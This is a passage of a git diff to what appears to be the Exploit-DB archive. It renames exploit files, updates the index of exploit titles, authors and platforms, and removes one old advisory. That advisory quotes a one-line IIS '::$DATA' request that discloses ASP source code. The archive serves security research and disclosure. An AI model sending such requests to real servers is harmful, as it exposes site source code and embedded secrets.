Vulnerability",1999-08-09,"Ross Harvey",multiple,local,0 19448,platforms/windows/remote/19448.c,"ToxSoft NextFTP 1.82 - Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19449,platforms/windows/remote/19449.c,"Fujitsu Chocoa 1.0 beta7R ""Topic"" Buffer Overflow Vulnerability",1999-08-03,UNYUN,windows,remote,0 19450,platforms/windows/remote/19450.c,"CREAR ALMail32 1.10 Buffer Overflow Vulnerability",1999-08-08,UNYUN,windows,remote,0 -19451,platforms/multiple/remote/19451,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 +19451,platforms/multiple/remote/19451.txt,"Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability",1999-08-11,L0pth,multiple,remote,0 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 Local DoS",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",windows,webapps,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client <= 8.9 (RFSync 1.0.0.1) Crash PoC",2012-06-29,"Luigi Auriemma",windows,dos,0 -19457,platforms/multiple/dos/19457,"Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 +19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 DoS",1999-08-11,"Nobuo Miwa",multiple,dos,0 19458,platforms/linux/remote/19458.c,"Linux kernel 2.0.30/2.0.35/2.0.36/2.0.37 - Blind TCP Spoofing Vulnerability",1999-07-31,Nergal,linux,remote,0 -19459,platforms/multiple/remote/19459,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 +19459,platforms/multiple/remote/19459.txt,"Hybrid Ircd 5.0.3 p7 Buffer Overflow Vulnerability",1999-08-13,"jduck and stranjer",multiple,remote,0 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,remote,0 19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0, Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 -19466,platforms/multiple/remote/19466,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 +19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability",1999-08-23,"Michal Zalewski",linux,local,0 -19468,platforms/windows/remote/19468,"Microsoft Internet Explorer 5.0 ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 +19468,platforms/windows/remote/19468.txt,"Microsoft Internet Explorer 5.0 ActiveX ""Object for constructing type libraries for scriptlets"" Vulnerability",1999-08-21,"Georgi Guninski",windows,remote,0 19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1)",1999-08-30,Akke,linux,local,0 19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2)",1999-08-25,jbowie,linux,local,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5.0 HTML Form Control DoS",1999-08-27,"Neon Bunny",windows,dos,0 -19472,platforms/windows/local/19472,"IBM GINA for NT 1.0 Privilege Escalation Vulnerability",1999-08-23,"Frank Pikelner",windows,local,0 -19473,platforms/windows/local/19473,"Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability",1999-08-25,"Makoto Shiotsuki",windows,local,0 -19474,platforms/linux/local/19474,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat <= 6.0 - Vixie Cron MAILTO Sendmail Vulnerability",1999-08-25,"Olaf Kirch",linux,local,0 +19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 Privilege Escalation Vulnerability",1999-08-23,"Frank Pikelner",windows,local,0 +19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5.0 FTP Password Storage Vulnerability",1999-08-25,"Makoto Shiotsuki",windows,local,0 +19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat <= 6.0 - Vixie Cron MAILTO Sendmail Vulnerability",1999-08-25,"Olaf Kirch",linux,local,0 19475,platforms/linux/remote/19475.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1)",1999-08-17,"babcia padlina ltd",linux,remote,0 19476,platforms/linux/remote/19476.c,"ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2)",1999-08-27,anonymous,linux,remote,0 -19477,platforms/hardware/dos/19477,"TFS Gateway 4.0 - Denial of Service Vulnerability",1999-08-31,anonymous,hardware,dos,0 +19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service Vulnerability",1999-08-31,anonymous,hardware,dos,0 19478,platforms/unix/remote/19478.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (1)",1999-08-31,Taeho,unix,remote,0 19479,platforms/unix/remote/19479.c,"BSD/OS 3.1/4.0.1,FreeBSD 3.0/3.1/3.2,RedHat Linux <= 6.0 amd Buffer Overflow Vulnerability (2)",1999-08-30,c0nd0r,unix,remote,0 19480,platforms/multiple/local/19480.c,"ISC INN <= 2.2,RedHat Linux <= 6.0 inews Buffer Overflow Vulnerability",1999-09-02,bawd,multiple,local,0 @@ -16819,13 +16819,13 @@ id,file,description,date,author,platform,type,port 19484,platforms/windows/remote/19484.rb,"HP Data Protector Create New Folder Buffer Overflow",2012-07-01,metasploit,windows,remote,3817 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 -19487,platforms/windows/remote/19487,"Microsoft Internet Explorer 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 +19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 ActiveX ""Eyedog"" Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0,NetBSD <= 1.4.2,OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 -19489,platforms/windows/dos/19489,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 -19490,platforms/windows/remote/19490,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 -19491,platforms/windows/remote/19491,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0 -19492,platforms/multiple/remote/19492,"Microsoft Internet Explorer 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 -19493,platforms/multiple/remote/19493,"Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability",1999-09-13,"Nobuo Miwa",multiple,remote,0 +19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 +19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 +19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0 +19492,platforms/multiple/remote/19492.txt,"Microsoft Internet Explorer 5.0,Netscape Communicator 4.0/4.5/4.6 Javascript STYLE Vulnerability",1999-09-13,"Georgi Guninski",multiple,remote,0 +19493,platforms/multiple/remote/19493.txt,"Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability",1999-09-13,"Nobuo Miwa",multiple,remote,0 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 SMTP Buffer Overflow Vulnerability",1999-09-13,UNYUN,windows,remote,0 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 POP Mail Buffer Overflow Vulnerability",1999-09-13,UNYUN,windows,remote,0 @@ -23314,9 +23314,9 @@ id,file,description,date,author,platform,type,port 26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System SetCookie.PHP Directory Traversal Vulnerability",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"PHPCommunityCalendar 4.0 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 26233,platforms/hardware/dos/26233.txt,"Cisco IOS 12.x Firewall Authentication Proxy Buffer Overflow Vulnerability",2005-09-07,Markus,hardware,dos,0 -26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 -26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 -26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 +26234,platforms/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - startup.php Cookie SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 +26235,platforms/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - news.php Multiple Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 +26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Include Vulnerability",2005-09-08,"NewAngels Team",php,webapps,0 26240,platforms/php/webapps/26240.txt,"Ultimate WordPress Auction Plugin 1.0 - CSRF Vulnerability",2013-06-17,expl0i13r,php,webapps,0 26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 @@ -30255,7 +30255,7 @@ id,file,description,date,author,platform,type,port 33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0 33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0 33584,platforms/multiple/dos/33584.txt,"IBM DB2 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 -33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x - (64bit) Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0 +33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x - (64 bit) Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200 @@ -31954,7 +31954,7 @@ id,file,description,date,author,platform,type,port 35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0 35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0 -35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0 +35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 @@ -32127,3 +32127,13 @@ id,file,description,date,author,platform,type,port 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x 'html_output' Parameter Cross Site Scripting Vulnerability",2011-04-26,KedAns-Dz,php,webapps,0 35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS Vulnerability",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35660,platforms/php/remote/35660.rb,"ProjectSend Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 +35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 +35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 'do' Parameter Cross Site Scripting Vulnerability",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x 'email' Parameter Cross-Site Scripting Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album 'showimage.php' Cross Site Scripting Vulnerability",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 SQL Injection and Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 +35667,platforms/php/webapps/35667.txt,"Joostina Multiple Components SQL Injection Vulnerability",2011-04-27,KedAns-Dz,php,webapps,0 +35668,platforms/php/webapps/35668.txt,"up.time Software 5 Administration Interface Remote Authentication Bypass Vulnerability",2011-04-27,"James Burton",php,webapps,0 +35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 +35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,metasploit,windows,local,0 diff --git a/platforms/aix/dos/19041 b/platforms/aix/dos/19041.txt similarity index 100% rename from platforms/aix/dos/19041 rename to platforms/aix/dos/19041.txt diff --git a/platforms/aix/dos/19043 b/platforms/aix/dos/19043.txt similarity index 100% rename from platforms/aix/dos/19043 rename to platforms/aix/dos/19043.txt diff --git a/platforms/aix/dos/19045 b/platforms/aix/dos/19045.txt similarity index 100% rename from platforms/aix/dos/19045 rename to platforms/aix/dos/19045.txt diff --git a/platforms/aix/dos/19046 b/platforms/aix/dos/19046.txt similarity index 100% rename from platforms/aix/dos/19046 rename to platforms/aix/dos/19046.txt diff --git a/platforms/aix/dos/19049 b/platforms/aix/dos/19049.txt similarity index 100% rename from platforms/aix/dos/19049 rename to platforms/aix/dos/19049.txt diff --git a/platforms/aix/local/19229 b/platforms/aix/local/19229.txt similarity index 100% rename from platforms/aix/local/19229 rename to platforms/aix/local/19229.txt diff --git a/platforms/aix/local/19300 b/platforms/aix/local/19300.txt similarity index 100% rename from platforms/aix/local/19300 rename to platforms/aix/local/19300.txt diff --git a/platforms/aix/local/19345 b/platforms/aix/local/19345.txt similarity index 100% rename from platforms/aix/local/19345 rename to platforms/aix/local/19345.txt diff --git a/platforms/aix/local/19354 b/platforms/aix/local/19354.txt similarity index 100% rename from platforms/aix/local/19354 rename to platforms/aix/local/19354.txt diff --git a/platforms/aix/local/19418 b/platforms/aix/local/19418.txt similarity index 100% rename from platforms/aix/local/19418 rename to platforms/aix/local/19418.txt diff --git a/platforms/aix/remote/19047 b/platforms/aix/remote/19047.txt similarity index 100% rename from platforms/aix/remote/19047 rename to platforms/aix/remote/19047.txt diff --git a/platforms/aix/remote/19048 b/platforms/aix/remote/19048.txt similarity index 100% rename from platforms/aix/remote/19048 rename to platforms/aix/remote/19048.txt diff --git a/platforms/aix/remote/19237 b/platforms/aix/remote/19237.txt similarity index 100% rename from platforms/aix/remote/19237 rename to platforms/aix/remote/19237.txt diff --git a/platforms/aix/remote/19348 b/platforms/aix/remote/19348.txt similarity index 100% rename from platforms/aix/remote/19348 rename to platforms/aix/remote/19348.txt diff --git a/platforms/bsd/local/19411 b/platforms/bsd/local/19411.txt similarity index 100% rename from platforms/bsd/local/19411 rename to platforms/bsd/local/19411.txt diff --git a/platforms/bsd/remote/19039 b/platforms/bsd/remote/19039.txt similarity index 100% rename from platforms/bsd/remote/19039 rename to platforms/bsd/remote/19039.txt diff --git a/platforms/hardware/dos/19436 b/platforms/hardware/dos/19436.txt similarity index 100% rename from platforms/hardware/dos/19436 rename to platforms/hardware/dos/19436.txt diff --git a/platforms/hardware/dos/19477 b/platforms/hardware/dos/19477.txt similarity index 100% rename from platforms/hardware/dos/19477 rename to platforms/hardware/dos/19477.txt diff --git a/platforms/hardware/remote/19444 b/platforms/hardware/remote/19444.txt similarity index 100% rename from platforms/hardware/remote/19444 rename to platforms/hardware/remote/19444.txt diff --git a/platforms/irix/local/19066 b/platforms/irix/local/19066.txt similarity index 100% rename from platforms/irix/local/19066 rename to platforms/irix/local/19066.txt diff --git a/platforms/irix/local/19067 b/platforms/irix/local/19067.txt similarity index 100% rename from platforms/irix/local/19067 rename to platforms/irix/local/19067.txt diff --git a/platforms/irix/local/19210 b/platforms/irix/local/19210.txt similarity index 100% rename from platforms/irix/local/19210 rename to platforms/irix/local/19210.txt diff --git a/platforms/irix/local/19262 b/platforms/irix/local/19262.txt similarity index 100% rename from platforms/irix/local/19262 rename to platforms/irix/local/19262.txt diff --git a/platforms/irix/local/19268 b/platforms/irix/local/19268.txt similarity index 100% rename from platforms/irix/local/19268 rename to platforms/irix/local/19268.txt diff --git a/platforms/irix/local/19269 b/platforms/irix/local/19269.txt similarity index 100% rename from platforms/irix/local/19269 rename to platforms/irix/local/19269.txt diff --git a/platforms/irix/local/19280 b/platforms/irix/local/19280.txt similarity index 100% rename from platforms/irix/local/19280 rename to platforms/irix/local/19280.txt diff --git a/platforms/irix/local/19304 b/platforms/irix/local/19304.txt similarity index 100% rename from platforms/irix/local/19304 rename to platforms/irix/local/19304.txt diff --git a/platforms/irix/local/19313 b/platforms/irix/local/19313.txt similarity index 100% rename from platforms/irix/local/19313 rename to platforms/irix/local/19313.txt diff --git a/platforms/irix/local/19349 b/platforms/irix/local/19349.txt similarity index 100% rename from platforms/irix/local/19349 rename to platforms/irix/local/19349.txt diff --git a/platforms/irix/local/19353 b/platforms/irix/local/19353.txt similarity index 100% rename from platforms/irix/local/19353 rename to platforms/irix/local/19353.txt diff --git a/platforms/irix/local/19355 b/platforms/irix/local/19355.txt similarity index 100% rename from platforms/irix/local/19355 rename to platforms/irix/local/19355.txt diff --git a/platforms/irix/local/19356 b/platforms/irix/local/19356.txt similarity index 100% rename from platforms/irix/local/19356 rename to platforms/irix/local/19356.txt diff --git a/platforms/irix/local/19358 b/platforms/irix/local/19358.txt similarity index 100% rename from platforms/irix/local/19358 rename to platforms/irix/local/19358.txt diff --git a/platforms/linux/dos/19080 b/platforms/linux/dos/19080.txt similarity index 100% rename from platforms/linux/dos/19080 rename to platforms/linux/dos/19080.txt diff --git a/platforms/linux/dos/19082 b/platforms/linux/dos/19082.txt similarity index 100% rename from platforms/linux/dos/19082 rename to platforms/linux/dos/19082.txt diff --git a/platforms/linux/local/19070 b/platforms/linux/local/19070.txt similarity index 100% rename from platforms/linux/local/19070 rename to platforms/linux/local/19070.txt diff --git a/platforms/linux/local/19071 b/platforms/linux/local/19071.txt similarity index 100% rename from platforms/linux/local/19071 rename to platforms/linux/local/19071.txt diff --git a/platforms/linux/local/19072 b/platforms/linux/local/19072.txt similarity index 100% rename from platforms/linux/local/19072 rename to platforms/linux/local/19072.txt diff --git a/platforms/linux/local/19073 b/platforms/linux/local/19073.txt similarity index 100% rename from platforms/linux/local/19073 rename to platforms/linux/local/19073.txt diff --git a/platforms/linux/local/19074 b/platforms/linux/local/19074.txt similarity index 100% rename from platforms/linux/local/19074 rename to platforms/linux/local/19074.txt diff --git a/platforms/linux/local/19095 b/platforms/linux/local/19095.txt similarity index 100% rename from platforms/linux/local/19095 rename to platforms/linux/local/19095.txt diff --git a/platforms/linux/local/19122 b/platforms/linux/local/19122.txt similarity index 100% rename from platforms/linux/local/19122 rename to platforms/linux/local/19122.txt diff --git a/platforms/linux/local/19125 b/platforms/linux/local/19125.txt similarity index 100% rename from platforms/linux/local/19125 rename to platforms/linux/local/19125.txt diff --git a/platforms/linux/local/19243 b/platforms/linux/local/19243.txt similarity index 100% rename from platforms/linux/local/19243 rename to platforms/linux/local/19243.txt diff --git a/platforms/linux/local/19250 b/platforms/linux/local/19250.txt similarity index 100% rename from platforms/linux/local/19250 rename to platforms/linux/local/19250.txt diff --git a/platforms/linux/local/19255 b/platforms/linux/local/19255.txt similarity index 100% rename from platforms/linux/local/19255 rename to platforms/linux/local/19255.txt diff --git a/platforms/linux/local/19272 b/platforms/linux/local/19272.txt similarity index 100% rename from platforms/linux/local/19272 rename to platforms/linux/local/19272.txt diff --git a/platforms/linux/local/19285 b/platforms/linux/local/19285.txt similarity index 100% rename from platforms/linux/local/19285 rename to platforms/linux/local/19285.txt diff --git a/platforms/linux/local/19422 b/platforms/linux/local/19422.txt similarity index 100% rename from platforms/linux/local/19422 rename to platforms/linux/local/19422.txt diff --git a/platforms/linux/local/19474 b/platforms/linux/local/19474.txt similarity index 100% rename from platforms/linux/local/19474 rename to platforms/linux/local/19474.txt diff --git a/platforms/linux/remote/19069 b/platforms/linux/remote/19069.txt similarity index 100% rename from platforms/linux/remote/19069 rename to platforms/linux/remote/19069.txt diff --git a/platforms/linux/remote/19076 b/platforms/linux/remote/19076.txt similarity index 100% rename from platforms/linux/remote/19076 rename to platforms/linux/remote/19076.txt diff --git a/platforms/linux/remote/19124 b/platforms/linux/remote/19124.txt similarity index 100% rename from platforms/linux/remote/19124 rename to platforms/linux/remote/19124.txt diff --git a/platforms/linux/remote/19253 b/platforms/linux/remote/19253.txt similarity index 100% rename from platforms/linux/remote/19253 rename to platforms/linux/remote/19253.txt diff --git a/platforms/multiple/dos/19225 b/platforms/multiple/dos/19225.txt similarity index 100% rename from platforms/multiple/dos/19225 rename to platforms/multiple/dos/19225.txt diff --git a/platforms/multiple/dos/19377 b/platforms/multiple/dos/19377.txt similarity index 100% rename from platforms/multiple/dos/19377 rename to platforms/multiple/dos/19377.txt diff --git a/platforms/multiple/dos/19378 b/platforms/multiple/dos/19378.txt similarity index 100% rename from platforms/multiple/dos/19378 rename to platforms/multiple/dos/19378.txt diff --git a/platforms/multiple/dos/19379 b/platforms/multiple/dos/19379.txt similarity index 100% rename from platforms/multiple/dos/19379 rename to platforms/multiple/dos/19379.txt diff --git a/platforms/multiple/dos/19380 b/platforms/multiple/dos/19380.txt similarity index 100% rename from platforms/multiple/dos/19380 rename to platforms/multiple/dos/19380.txt diff --git a/platforms/multiple/dos/19382 b/platforms/multiple/dos/19382.txt similarity index 100% rename from platforms/multiple/dos/19382 rename to platforms/multiple/dos/19382.txt diff --git a/platforms/multiple/dos/19457 b/platforms/multiple/dos/19457.txt similarity index 100% rename from platforms/multiple/dos/19457 rename to platforms/multiple/dos/19457.txt diff --git a/platforms/multiple/local/19430 b/platforms/multiple/local/19430.txt similarity index 100% rename from platforms/multiple/local/19430 rename to platforms/multiple/local/19430.txt diff --git a/platforms/multiple/remote/19081 b/platforms/multiple/remote/19081.txt similarity index 100% rename from platforms/multiple/remote/19081 rename to platforms/multiple/remote/19081.txt diff --git a/platforms/multiple/remote/19084 b/platforms/multiple/remote/19084.txt similarity index 100% rename from platforms/multiple/remote/19084 rename to platforms/multiple/remote/19084.txt diff --git a/platforms/multiple/remote/19093 b/platforms/multiple/remote/19093.txt similarity index 100% rename from platforms/multiple/remote/19093 rename to platforms/multiple/remote/19093.txt diff --git a/platforms/multiple/remote/19118 b/platforms/multiple/remote/19118 deleted file mode 100755 index ce01860fa..000000000 --- a/platforms/multiple/remote/19118 +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/149/info - -Microsoft IIS and other NT webservers contain a vulnerability that allows remote users to obtain the source code for an ASP file. When one appends ::$DATA to an asp being requested, the ASP source will be returned, instead of executing the ASP. For example: http://xyz/myasp.asp::$DATA will return the source of myasp.asp, instead of executing it. - -The following proof of concept was provided: - -http://xyz/myasp.asp::$DATA - -This will cause IIS to disclose the contents of the page, myasp.asp, to an attacker. \ No newline at end of file diff --git a/platforms/multiple/remote/19120 b/platforms/multiple/remote/19120.txt similarity index 100% rename from platforms/multiple/remote/19120 rename to platforms/multiple/remote/19120.txt diff --git a/platforms/multiple/remote/19121 b/platforms/multiple/remote/19121.txt similarity index 100% rename from platforms/multiple/remote/19121 rename to platforms/multiple/remote/19121.txt diff --git a/platforms/multiple/remote/19127 b/platforms/multiple/remote/19127.txt similarity index 100% rename from platforms/multiple/remote/19127 rename to platforms/multiple/remote/19127.txt diff --git a/platforms/multiple/remote/19129 b/platforms/multiple/remote/19129.txt similarity index 100% rename from platforms/multiple/remote/19129 rename to platforms/multiple/remote/19129.txt diff --git a/platforms/multiple/remote/19193 b/platforms/multiple/remote/19193.txt similarity index 100% rename from platforms/multiple/remote/19193 rename to platforms/multiple/remote/19193.txt diff --git a/platforms/multiple/remote/19194 b/platforms/multiple/remote/19194.txt similarity index 100% rename from platforms/multiple/remote/19194 rename to platforms/multiple/remote/19194.txt diff --git a/platforms/multiple/remote/19212 b/platforms/multiple/remote/19212.txt similarity index 100% rename from platforms/multiple/remote/19212 rename to platforms/multiple/remote/19212.txt diff --git a/platforms/multiple/remote/19221 b/platforms/multiple/remote/19221.txt similarity index 100% rename from platforms/multiple/remote/19221 rename to platforms/multiple/remote/19221.txt diff --git a/platforms/multiple/remote/19222 b/platforms/multiple/remote/19222.txt similarity index 100% rename from platforms/multiple/remote/19222 rename to platforms/multiple/remote/19222.txt diff --git a/platforms/multiple/remote/19223 b/platforms/multiple/remote/19223.txt similarity index 100% rename from platforms/multiple/remote/19223 rename to platforms/multiple/remote/19223.txt diff --git a/platforms/multiple/remote/19230 b/platforms/multiple/remote/19230.txt similarity index 100% rename from platforms/multiple/remote/19230 rename to platforms/multiple/remote/19230.txt diff --git a/platforms/multiple/remote/19242 b/platforms/multiple/remote/19242.txt similarity index 100% rename from platforms/multiple/remote/19242 rename to platforms/multiple/remote/19242.txt diff --git a/platforms/multiple/remote/19298 b/platforms/multiple/remote/19298.txt similarity index 100% rename from platforms/multiple/remote/19298 rename to platforms/multiple/remote/19298.txt diff --git a/platforms/multiple/remote/19299 b/platforms/multiple/remote/19299.txt similarity index 100% rename from platforms/multiple/remote/19299 rename to platforms/multiple/remote/19299.txt diff --git a/platforms/multiple/remote/19303 b/platforms/multiple/remote/19303.txt similarity index 100% rename from platforms/multiple/remote/19303 rename to platforms/multiple/remote/19303.txt diff --git a/platforms/multiple/remote/19363 b/platforms/multiple/remote/19363.txt similarity index 100% rename from platforms/multiple/remote/19363 rename to platforms/multiple/remote/19363.txt diff --git a/platforms/multiple/remote/19383 b/platforms/multiple/remote/19383.txt 